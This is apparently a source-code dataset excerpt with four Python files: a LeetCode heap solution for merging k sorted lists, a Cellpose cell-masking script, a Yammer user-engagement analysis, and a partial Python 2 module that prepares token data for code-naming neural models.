LeetCode/0023_merge_k_sorted_lists.py
|
KanegaeGabriel/ye-olde-interview-prep-grind
|
868362872523a5688f49ab48efb09c3008e0db4d
|
[
"MIT"
] | null | null | null |
LeetCode/0023_merge_k_sorted_lists.py
|
KanegaeGabriel/ye-olde-interview-prep-grind
|
868362872523a5688f49ab48efb09c3008e0db4d
|
[
"MIT"
] | null | null | null |
from heapq import heappush, heappop
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __lt__(self, other):
return self.val < other.val
def mergeKLists(lists):
result = ListNode(-1)
p = result
heap = []
for l in lists:
if l: heappush(heap, l)
while heap:
cur = heappop(heap)
if cur.next: heappush(heap, cur.next)
p.next = cur
p = p.next
return result.next
l1 = ListNode(1)
l1.next = ListNode(4)
l1.next.next = ListNode(5)
l2 = ListNode(1)
l2.next = ListNode(3)
l2.next.next = ListNode(4)
l3 = ListNode(2)
l3.next = ListNode(6)
l3 = mergeKLists([l1, l2, l3])
p = l3
while p:
print(p.val, end=" ") # 1 1 2 3 4 4 5 6
p = p.next
print()
| 17.477273
| 45
| 0.579974
| 121
| 769
| 3.619835
| 0.322314
| 0.136986
| 0.027397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0.289987
| 769
| 44
| 46
| 17.477273
| 0.747253
| 0.019506
| 0
| 0.060606
| 0
| 0
| 0.001328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.030303
| 0.030303
| 0.212121
| 0.060606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82a766dd5a8919e5aec354cbe63b71c9cd59549
| 2,297
|
py
|
Python
|
source/cell_mask/cell_mask.py
|
zhanyinx/SPT_analysis
|
1cf806c1fd6051e7fc998d2860a16bea6aa9de1a
|
[
"MIT"
] | 1
|
2021-07-09T11:51:04.000Z
|
2021-07-09T11:51:04.000Z
|
source/cell_mask/cell_mask.py
|
zhanyinx/SPT_analysis
|
1cf806c1fd6051e7fc998d2860a16bea6aa9de1a
|
[
"MIT"
] | null | null | null |
source/cell_mask/cell_mask.py
|
zhanyinx/SPT_analysis
|
1cf806c1fd6051e7fc998d2860a16bea6aa9de1a
|
[
"MIT"
] | null | null | null |
import argparse
import glob
import numpy as np
import os
import skimage.io
import torch
import tifffile
from cellpose import models
def _parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=str,
default=None,
required=True,
help="Input image or folder with images to mask.",
)
parser.add_argument(
"-o",
"--output",
type=str,
default=None,
required=False,
help="Output folder, default mask within input folder",
)
parser.add_argument(
"-t",
"--target",
type=str,
default=None,
required=False,
help="Target channel tag, if provided, it will look for files with the tag.",
)
args = parser.parse_args()
return args
def main():
"""Create cell masks and save them into mask folder within input folder."""
args = _parse_args()
if os.path.isdir(args.input):
inputs = glob.glob(f"{args.input}/*tif")
elif os.path.isfile(args.input):
inputs = [args.input]
else:
raise ValueError(f"Expected input folder or file. Provided {args.input}.")
if args.target is not None:
inputs = [x for x in inputs if args.target in x]
output = args.output
if output is None:
output = f"{os.path.abspath(args.input)}/mask"
if not os.path.exists(output):
os.mkdir(output)
cellpose_model = models.Cellpose(model_type="cyto", gpu=False)
for input_file in inputs:
img = skimage.io.imread(input_file)
middle_slice = len(img) // 2
if len(img.shape) == 4:
mask_nucl, *_ = cellpose_model.eval(
[np.max(img, axis=1)[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
if len(img.shape) == 3:
mask_nucl, *_ = cellpose_model.eval(
[img[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
name = os.path.basename(input_file)
out = f"{output}/{name}"
tifffile.imsave(out, mask_nucl[0])
if __name__ == "__main__":
main()
| 25.241758
| 85
| 0.562908
| 284
| 2,297
| 4.43662
| 0.394366
| 0.042857
| 0.040476
| 0.042857
| 0.180952
| 0.120635
| 0.120635
| 0.065079
| 0.065079
| 0.065079
| 0
| 0.012141
| 0.318677
| 2,297
| 90
| 86
| 25.522222
| 0.792971
| 0.0431
| 0
| 0.256757
| 0
| 0
| 0.145405
| 0.015546
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.108108
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82b6067d87e3c320c8e0fb55b9b998dccade592
| 14,134
|
py
|
Python
|
02-customer-cliff-dive/python/emery_leslie.py
|
leslem/insight-data-challenges
|
14c56d30663d7fef178b820d2128dbf4782c1200
|
[
"MIT"
] | null | null | null |
02-customer-cliff-dive/python/emery_leslie.py
|
leslem/insight-data-challenges
|
14c56d30663d7fef178b820d2128dbf4782c1200
|
[
"MIT"
] | 1
|
2021-06-08T02:43:08.000Z
|
2021-06-08T03:05:21.000Z
|
02-customer-cliff-dive/python/emery_leslie.py
|
leslem/insight-data-challenges
|
14c56d30663d7fef178b820d2128dbf4782c1200
|
[
"MIT"
] | null | null | null |
# # Customer cliff dive data challenge
# 2020-02-17
# Leslie Emery
# ## Summary
# ### The problem
# The head of the Yammer product team has noticed a precipitous drop in weekly active users, which is one of the main KPIs for customer engagement. What has caused this drop?
# ### My approach and results
# I began by coming up with several questions to investigate:
# - Was there any change in the way that weekly active users is calculated?
# - This does not appear to be the case. To investigate this, I began by replicating the figure from the dashboard. I calculated a rolling 7-day count of engaged users, making sure to use the same method across the entire time frame covered by the dataset, and it still showed the same drop in engagement.
# - Was there a change in any one particular type of "engagement"?
# - I looked at a rolling 7-day count of each individual type of engagement action. From plotting all of these subplots, it looks to me like home_page, like_message, login, send_message, and view_inbox are all exhibiting a similar drop around the same time, so it's these underlying events that are driving the drop.
# - Could a change in the user interface be making it more difficult or less pleasant for users?
# - I couldn't find information in the available datasets to address this question. The `yammer_experiments` data set has information about experiments going on, presumably in the user interface. All of the listed experiments happened in June of 2014, though, which I think is too early to have caused the August drop in engagement.
# - Is this drop a seasonal change that happens around this time every year?
# - Because the data is only available for the period of time shown in the original dashboard, I can't investigate this question. I'd be very interested to see if there is a pattern of reduced engagement at the end of the summer, perhaps related to vacation or school schedules.
# - Are users visiting the site less because they're getting more content via email?
# - I calculated 7-day rolling counts of each type of email event, and all email events together. Email events overall went up during the time period immediately before the drop in user engagement. All four types of email events increased during the same period, indicating higher clickthroughs on emails, higher numbers of email open events, and more reengagement and weekly digest emails sent. It could be that the higher number of weekly digests sent out mean that users don't have to visit the site directly as much.
# - Are users disengaging from the site due to too many emails/notifications?
# - I calculated a rolling 7-day count of emails sent to each user and found that the number of emails sent to each user per 7-day period has increased from 5.4 emails (July 20) to 7.75 emails (August 11). This suggests that an increasing volume of emails sent to individual users could have driven them away from using the site. To investigate this further I would want to look into email unsubscribe rates. If unsubscribe rates have also gone up, then it seems that Yammer is sending too many emails to its users.
# - To investigate whether the number of emails sent per user is correlated with the number of engaged users, I used a Granger causality test to see if "emails sent per user" could be used to predict "number of engaged users". With a high enough lag, the test statistics might be starting to become significant, but I would want to investigate these test results further before making any recommendations based on them.
# - Is the drop in engagement due to a decrease in new activated users? e.g. they are reaching the end of potential customer base?
# - I calculated the cumulative number of newly activated users over time, using the activation time for each user in the users table. I wanted to see if customer growth had leveled off. However, I saw that customer growth was still increasing in the same pattern. This was true when using creating date rather than activation date as well.
# What is my recommendation to Yammer?
# I have a few recommendations to Yammer:
# - Try decreasing the number of emails sent to each individual user to see if this increases engagement. They could try this for a subset of users first.
# - Investigate email unsubscribe rates to see if they are going up. This would indicate that increased email volume might be making users unhappy.
# - Compare this data to a wider time range to see if the drop shown here is seasonal.
# +
import matplotlib.pyplot as plt
import numpy as np
import os
import plotly.express as px
import pandas as pd
from scipy import stats
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import grangercausalitytests
# -
data_dir = '/Users/leslie/devel/insight-data-challenges/02-customer-cliff-dive/data'
benn_normal = pd.read_csv(os.path.join(data_dir, 'benn.normal_distribution - benn.normal_distribution.csv.tsv'), sep='\t')
rollup_periods = pd.read_csv(os.path.join(data_dir, 'dimension_rollup_periods - dimension_rollup_periods.csv.tsv'), sep='\t',
parse_dates=['time_id', 'pst_start', 'pst_end', 'utc_start', 'utc_end'])
yammer_emails = pd.read_csv(os.path.join(data_dir, 'yammer_emails - yammer_emails.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_events = pd.read_csv(os.path.join(data_dir, 'yammer_events - yammer_events.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_experiments = pd.read_csv(os.path.join(data_dir, 'yammer_experiments - yammer_experiments.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_users = pd.read_csv(os.path.join(data_dir, 'yammer_users - yammer_users.csv.tsv'), sep='\t',
parse_dates=['created_at', 'activated_at'])
# +
benn_normal.info()
benn_normal.head()
benn_normal.describe()
rollup_periods.info()
rollup_periods.head()
rollup_periods.describe()
yammer_emails.info()
yammer_emails.head()
yammer_emails.describe()
yammer_emails['action'].value_counts(dropna=False)
yammer_emails['user_type'].value_counts(dropna=False)
yammer_events.info()
yammer_events.head()
yammer_events.describe()
yammer_events['occurred_at']
yammer_events['event_type'].value_counts(dropna=False)
yammer_events['event_name'].value_counts(dropna=False)
yammer_events['location'].value_counts(dropna=False)
yammer_events['device'].value_counts(dropna=False)
yammer_events['user_type'].value_counts(dropna=False)
yammer_events['user_type'].dtype
# user_type should be an int, but has many missing values, and NaN is a float.
# So convert it to the Pandas Int64 dtype which can accommodate NaNs and ints.
yammer_events = yammer_events.astype({'user_type': 'Int64'})
yammer_experiments.info()
yammer_experiments.head()
yammer_experiments.describe()
yammer_experiments['experiment'].value_counts(dropna=False)
yammer_experiments['experiment_group'].value_counts(dropna=False)
yammer_experiments['location'].value_counts(dropna=False)
yammer_experiments['device'].value_counts(dropna=False)
yammer_users.info()
yammer_users.head()
yammer_users.describe()
yammer_users['language'].value_counts(dropna=False)
yammer_users['state'].value_counts(dropna=False)
yammer_users['company_id'].value_counts(dropna=False)
# -
# ## Initial data investigation
# +
# How many days in the dataset?
yammer_events['occurred_at'].max() - yammer_events['occurred_at'].min()
# 122 days!
rollup_periods['pst_start'].max() - rollup_periods['pst_end'].min()
# 1094 days - way more intervals than needed to tile this events data!
yammer_events = yammer_events.sort_values(by='occurred_at', ascending=True)
small_events = yammer_events.head(int(yammer_events.shape[0]/10)).sample(n=40)
small_events = small_events.sort_values(by='occurred_at', ascending=True)
small_events['occurred_at'].max() - small_events['occurred_at'].min()
weekly_rollup_periods = rollup_periods.loc[rollup_periods['period_id'] == 1007]
# -
# +
small_rolling_engagement = small_events.loc[small_events['event_type'] == 'engagement'].rolling(
'7D', on='occurred_at').count()
# I'm not sure whether rollup_periods are closed on right, left, or both...
# Calculate counts of engagement events in a 7-day rolling window
rolling_engagement_counts = yammer_events.loc[yammer_events['event_type'] == 'engagement'].sort_values(
by='occurred_at', ascending=True # Have to sort by "on" column to use rolling()
).rolling('7D', on='occurred_at', min_periods=1).count()
# +
# Use a loop to aggregate on rollup periods
yammer_events['event_name'].unique()
event_range = [min(yammer_events['occurred_at']), max(yammer_events['occurred_at'])]
covered_weekly_rollup_periods = weekly_rollup_periods.loc[(weekly_rollup_periods['pst_end'] <= event_range[1])
& (weekly_rollup_periods['pst_start'] >= event_range[0])]
# in interval --> start < occurred_at <= end
counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_events.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])
& (yammer_events['event_type'] == 'engagement')]
# Count user engagement events
cbt = df.groupby('event_name').aggregate(event_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['engaged_users'] = df['user_id'].nunique()
cbt['engagement_event_count'] = df.shape[0]
if counts_by_type is None:
counts_by_type = cbt
else:
counts_by_type = counts_by_type.append(cbt)
counts_by_type
# +
# Plot engaged users over time
fig = px.scatter(counts_by_type, x='pst_end', y='engaged_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of engagement_events over time
fig = px.scatter(counts_by_type, x='pst_end', y='engagement_event_count', template='plotly_white')
fig.show()
# Plot count of individual event types over time
counts_melted = counts_by_type.melt(id_vars=['pst_start', 'pst_end', 'engaged_users', 'engagement_event_count'])
fig = px.scatter(counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='event_name', facet_col_wrap=3, height=1200)
fig.update_yaxes(matches=None)
fig.show()
# -
# Are there any "experiments" messing things up?
yammer_experiments['occurred_at'].describe()
# No, these are all before the issue shows up
# +
# Investigate the sending of emails to user in the same rollup periods
email_counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_emails.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])]
# Count user engagement events
cbt = df.groupby('action').aggregate(action_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['emailed_users'] = df['user_id'].nunique()
cbt['email_event_count'] = df.shape[0]
cbt['emails_sent_per_user'] = df.loc[df['action'].str.startswith('sent_')].groupby(
'user_id').count().mean()['user_type']
if email_counts_by_type is None:
email_counts_by_type = cbt
else:
email_counts_by_type = email_counts_by_type.append(cbt)
email_counts_by_type
# +
# Plot emailed users over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='emailed_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of email events over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='email_event_count', template='plotly_white')
fig.show()
# Plot count of individual email types over time
email_counts_melted = email_counts_by_type.melt(id_vars=[
'pst_start', 'pst_end', 'emailed_users', 'email_event_count', 'emails_sent_per_user'])
fig = px.scatter(email_counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='action', facet_col_wrap=2)
fig.update_yaxes(matches=None)
fig.show()
# -
# +
# What is email engagement event count per user? Did that increase?
# +
fig = px.scatter(email_counts_by_type, x='pst_start', y='emails_sent_per_user', template='plotly_white')
fig.show()
p, r = stats.pearsonr(email_counts_by_type['emails_sent_per_user'].to_numpy(),
counts_by_type['engaged_users'].to_numpy())
# They do look moderately correlated, but how do I test that one has an effect on the other?
# -
acf_50 = acf(counts_by_type['engaged_users'], nlags=50, fft=True)
pacf_50 = pacf(counts_by_type['engaged_users'], nlags=50)
fig, axes = plt.subplots(1, 2, figsize=(16, 3), dpi=200)
plot_acf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[0])
plot_pacf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[1])
plt.show()
test_df = pd.DataFrame({'emails_sent_per_user': email_counts_by_type['emails_sent_per_user'].to_numpy(),
'engaged_users': counts_by_type['engaged_users'].to_numpy()})
lags = range(20)
caus_test = grangercausalitytests(test_df, maxlag=lags)
# Has there been a dropoff in new users?
# +
yammer_users = yammer_users.sort_values(by='created_at', ascending=True)
yammer_users['cumulative_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_users', template='plotly_white')
fig.show()
# Nope, growth is still practicially exponenital
yammer_users['cumulative_activated_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_activated_users', template='plotly_white')
fig.show()
yammer_users['company_id'].nunique()
# -
| 51.963235
| 524
| 0.743809
| 2,168
| 14,134
| 4.660978
| 0.223247
| 0.038001
| 0.032063
| 0.03048
| 0.35052
| 0.307472
| 0.254132
| 0.215636
| 0.192083
| 0.15616
| 0
| 0.008326
| 0.150276
| 14,134
| 271
| 525
| 52.154982
| 0.833056
| 0.417787
| 0
| 0.163265
| 0
| 0.006803
| 0.22371
| 0.045332
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.061224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82c200cd117a48cc9a2ebacd146f50b56baabcf
| 23,587
|
py
|
Python
|
convolutional_attention/token_naming_data.py
|
s1530129650/convolutional-attention
|
8839da8146962879bb419a61253e7cf1b684fb22
|
[
"BSD-3-Clause"
] | 128
|
2016-05-10T01:38:27.000Z
|
2022-02-04T07:14:12.000Z
|
convolutional_attention/token_naming_data.py
|
s1530129650/convolutional-attention
|
8839da8146962879bb419a61253e7cf1b684fb22
|
[
"BSD-3-Clause"
] | 6
|
2016-07-19T09:27:47.000Z
|
2021-07-08T21:22:32.000Z
|
convolutional_attention/token_naming_data.py
|
s1530129650/convolutional-attention
|
8839da8146962879bb419a61253e7cf1b684fb22
|
[
"BSD-3-Clause"
] | 36
|
2016-05-11T08:57:26.000Z
|
2021-07-07T02:37:07.000Z
|
from collections import defaultdict
import heapq
from itertools import chain, repeat
from feature_dict import FeatureDictionary
import json
import numpy as np
import scipy.sparse as sp
class TokenCodeNamingData:
SUBTOKEN_START = "%START%"
SUBTOKEN_END = "%END%"
NONE = "%NONE%"
@staticmethod
def __get_file_data(input_file):
with open(input_file, 'r') as f:
data = json.load(f)
# data=[{"tokens":"hello world I am OK".split(),"name":"hello world you".split()}]*4
# data+=[{"tokens":"just another test of a silly program".split(),"name":"who knows".split()}]*4
names = []
original_names = []
code = []
for entry in data:
# skip entries with no relevant data (this will crash the code)
if len(entry["tokens"]) == 0 or len(entry["name"]) == 0:
continue
code.append(TokenCodeNamingData.remove_identifiers_markers(entry["tokens"]))
original_names.append(",".join(entry["name"]))
subtokens = entry["name"]
names.append([TokenCodeNamingData.SUBTOKEN_START] + subtokens + [TokenCodeNamingData.SUBTOKEN_END])
return names, code, original_names
def __init__(self, names, code):
self.name_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(names), 2)
self.name_dictionary.add_or_get_id(self.NONE)
self.all_tokens_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(
[chain.from_iterable(code), chain.from_iterable(names)]), 5)
self.all_tokens_dictionary.add_or_get_id(self.NONE)
self.name_empirical_dist = self.__get_empirical_distribution(self.all_tokens_dictionary, chain.from_iterable(names))
@staticmethod
def __get_empirical_distribution(element_dict, elements, dirichlet_alpha=10.):
"""
Retrive te empirical distribution of tokens
:param element_dict: a dictionary that can convert the elements to their respective ids.
:param elements: an iterable of all the elements
:return:
"""
targets = np.array([element_dict.get_id_or_unk(t) for t in elements])
empirical_distribution = np.bincount(targets, minlength=len(element_dict)).astype(float)
empirical_distribution += dirichlet_alpha / len(empirical_distribution)
return empirical_distribution / (np.sum(empirical_distribution) + dirichlet_alpha)
def __get_in_lbl_format(self, data, dictionary, cx_size):
targets = []
contexts = []
ids = []
for i, sequence in enumerate(data):
for j in xrange(1, len(sequence)): # First element should always be predictable (ie sentence start)
ids.append(i)
targets.append(dictionary.get_id_or_unk(sequence[j]))
context = sequence[:j]
if len(context) < cx_size:
context = [self.NONE] * (cx_size - len(context)) + context
else:
context = context[-cx_size:]
assert len(context) == cx_size, (len(context), cx_size,)
contexts.append([dictionary.get_id_or_unk(t) for t in context])
return np.array(targets, dtype=np.int32), np.array(contexts, dtype=np.int32), np.array(ids, np.int32)
def get_data_in_lbl_format(self, input_file, code_cx_size, names_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_in_lbl_format(names, self.name_dictionary, names_cx_size), \
self.__get_in_lbl_format(code, self.all_tokens_dictionary, code_cx_size), original_names
@staticmethod
def get_data_in_lbl_format_with_validation(input_file, code_cx_size, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_in_lbl_format(names[:lim], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[:lim], naming.all_tokens_dictionary, code_cx_size), original_names[:lim], \
naming.__get_in_lbl_format(names[lim:], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[lim:], naming.all_tokens_dictionary, code_cx_size), original_names[lim:], naming
@staticmethod
def get_data_in_forward_format_with_validation(input_file, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_data_in_forward_format(names[:lim], code[:lim], names_cx_size),\
naming.__get_data_in_forward_format(names[lim:], code[lim:], names_cx_size), naming
def get_data_in_forward_format(self, input_file, name_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_data_in_forward_format(names, code, name_cx_size), original_names
def __get_data_in_forward_format(self, names, code, name_cx_size):
"""
Get the data in a "forward" model format.
:param data:
:param name_cx_size:
:return:
"""
assert len(names) == len(code), (len(names), len(code), code.shape)
# Keep only identifiers in code
#code = self.keep_identifiers_only(code)
name_targets = []
name_contexts = []
original_names_ids = []
id_xs = []
id_ys = []
k = 0
for i, name in enumerate(names):
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.name_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
for code_token in set(code[i]):
token_id = self.all_tokens_dictionary.get_id_or_none(code_token)
if token_id is not None:
id_xs.append(k)
id_ys.append(token_id)
k += 1
code_features = sp.csr_matrix((np.ones(len(id_xs)), (id_xs, id_ys)), shape=(k, len(self.all_tokens_dictionary)), dtype=np.int32)
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_features, original_names_ids
@staticmethod
def keep_identifiers_only(self, code):
filtered_code = []
for tokens in code:
identifier_tokens = []
in_id = False
for t in tokens:
if t == "<id>":
in_id = True
elif t == '</id>':
in_id = False
elif in_id:
identifier_tokens.append(t)
filtered_code.append(identifier_tokens)
return filtered_code
@staticmethod
def remove_identifiers_markers(code):
return filter(lambda t: t != "<id>" and t != "</id>", code)
def get_data_in_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_copy_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_copy_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_recurrent_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_convolution(names, code, min_code_size), original_names
def get_data_in_recurrent_copy_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_copy_convolution(names, code, min_code_size), original_names
def get_data_for_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_sentences, original_names_ids
def get_data_for_recurrent_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
return name_targets, code_sentences
def get_data_for_recurrent_copy_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
target_is_unk = []
copy_vectors = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
unk_tokens = [self.all_tokens_dictionary.is_unk(t) for t in name]
target_can_be_copied = [[t == subtok for t in code[i]] for subtok in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
target_is_unk.append(np.array(unk_tokens, dtype=np.int32))
copy_vectors.append(np.array(target_can_be_copied, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
code = np.array(code, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.object)
copy_vectors = np.array(copy_vectors, dtype=np.object)
return name_targets, code_sentences, code, target_is_unk, copy_vectors
@staticmethod
def get_data_in_recurrent_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_recurrent_copy_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
@staticmethod
def get_data_in_copy_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
